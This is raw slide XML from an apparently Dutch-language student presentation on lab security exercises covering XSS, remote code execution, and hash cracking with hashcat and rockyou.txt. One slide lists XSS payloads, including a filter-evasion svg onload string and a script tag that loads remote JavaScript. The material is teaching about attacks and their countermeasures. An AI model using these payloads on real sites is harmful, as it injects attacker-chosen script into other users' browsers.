              <a:rPr lang="nl-BE" sz="3600" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="3600" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="3600" dirty="0"/>
              <a:t> security: Opdracht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E20749A-B37A-1D58-2B4B-917953268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056747"/>
            <a:ext cx="9866920" cy="3207258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000" dirty="0"/>
              <a:t>Korte uitleg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/onload='+/"/+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=1/+/[*/[]/+alert(1)//’&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="2000" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F050202020403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 b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js&gt;&lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-BE" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="nl-BE" sz="2000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5D894C1-02C5-04AC-A0FA-FD7F754C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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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3419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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AADD6EF6-5E5C-12AE-0943-E00A39122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0F24EA8-8FD0-281D-5990-BA379B38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Web application security: Cross site scripting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30A8F1-C7AD-B9E3-2D6E-EE8F9886C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Wat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misbruiken van onvoldoende validatie of filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gebruik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kwaadaardige javascript code uitvoeren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EA9BE07-E411-1FDB-1F3E-B499570A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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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9397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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22DF9B90-33AD-D3DC-D64D-28C412433D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D083F50-A529-C0AA-C08A-9E763951C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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> security: Remote code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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F0F1CC-ECDA-0924-E232-37AC1C67F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Wat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externe code uitvoeren op een website of server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gebruik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verkrijgen van informatie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overnemen van systeem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malware installeren </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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A5FEFB7-093D-BB3D-6A5D-C15E8085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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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1044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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C75BACC4-AA5E-8BC1-B93B-B555301F16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0CE4A44-5EAB-4C84-C2E9-E703813F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Conclusie: XSS 1 – 2 &amp; Web app security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792A56-C047-EFAA-BAE9-F157ECC66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Samenvatting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soorten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vormen XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>measures</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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F90DDCA-D18D-4843-0312-78EF2562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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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1157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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1ECF2AF-F441-11CE-41C6-CFBFAFC967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8636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C7BC702-5567-D087-6B4D-00985744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Hashing challenge: Opdracht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8D598F-B6B8-7511-CA88-5B82CCBF9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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soorten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MD4 / MD5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHA2-256 / sha2-512</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whirlpool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scrypt</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Argon2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samenvatting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decoden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hashCat</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rockyou.txt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C829BBB-3882-29F1-1696-341A0BCF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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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9938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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A24441-8E24-02B5-7528-5238791BC7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FACA5D0-ADEE-39CC-1A75-4AF2FC1DD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nl-BE" sz="500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2CF799-42FE-1C56-EAA2-D6CC2F3FD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nl-BE" sz="2000"/>
              <a:t>Dirbuster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000"/>
              <a:t>Modern Web App</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000"/>
              <a:t>Samba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000"/>
              <a:t>XXS 3.3.1 &amp; 3.3.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000"/>
              <a:t>Web app security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000"/>
              <a:t>Hashing Challenge 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61CA34-090E-4B49-CF50-081AF457F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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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6428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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32E719A-1554-B0F1-6F6B-BC09CEC3E4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652B960-2BE3-213A-B15C-400E560B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Hashing challenge: Soorten decoders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59262B9-2238-5E55-D769-6C4C48949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Online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> line environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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3C9DA5A-0DA4-4AE6-47EC-D73C1770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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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3571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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC260CD3-B7F7-BCBD-0189-3D4D6821B7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-8616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146E7B-5AB4-DB04-DE8A-62CA0E5A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Hashing challenge: Rainbow tables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9C624A-B17D-DC0B-47F8-DFB4D87BF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Definitie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collectie van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniek?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwords</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wie? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pen testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>white</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hat hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>measures</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Salt / Waarde toevoegen voor het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE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AB9BFA2-DEDF-F721-B935-B615DCB1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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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7016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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B1BFF2-14E3-2351-C68E-98DD47B635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3DC309A-2690-E89F-F62F-8216E668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Hashing Challenge: Conclusie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CD36DEC-4946-9237-6ACE-31C3E28D4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Waarom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encrypten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bescherming informatie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bescherming data base </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Beperking aansprakelijkheid </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Veilige en onveilige encrypties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0868D0C-847A-8EBE-AFBE-9D80ADF6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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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0291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410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2EEAC-A917-D328-545A-92DD8D492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nl-BE" sz="4200"/>
              <a:t>Wat hebben we geleerd: SOS Klaas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410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6C5097-AEA8-1190-E0E2-12D1FFDFA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nl-BE" sz="2200"/>
              <a:t>Dirbuster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2200"/>
              <a:t>Modern Web App</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2200"/>
              <a:t>Samba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2200"/>
              <a:t>XXS 3.3.1 &amp; 3.3.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2200"/>
              <a:t>Web app security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2200"/>
              <a:t>Hashing Challenge </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-BE" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Ik ben een ongelofelijke eikel geweest. Maar je moet dat kaderen in het  tijdsbeeld”: Piet Huysentruyt blikt terug | POPULAIR IN HLN+ SHOWBIZZ |  hln.be">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8AFBBE-0F87-DA83-0213-3C8BE1F09B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3" r="13773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13BD4C4-2515-CC33-B04C-22E9D1E0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1608F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-B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23</a:t>
            </a:fld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723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Hangslot op een computermoederbord">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13883127-EC18-654C-4408-7B5892FCDC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-2" b="15726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0B30D5-1F1C-5C56-B6FD-F75E9870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5155263" cy="5571899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Vragen + slide nummers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368090B-4714-3B34-23B8-C4F5BEF71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5" y="557189"/>
            <a:ext cx="5158424" cy="5571899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dirbuster </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modern Web App </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXS 3.3.1 &amp; 3.3.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2000">
                <a:solidFill>
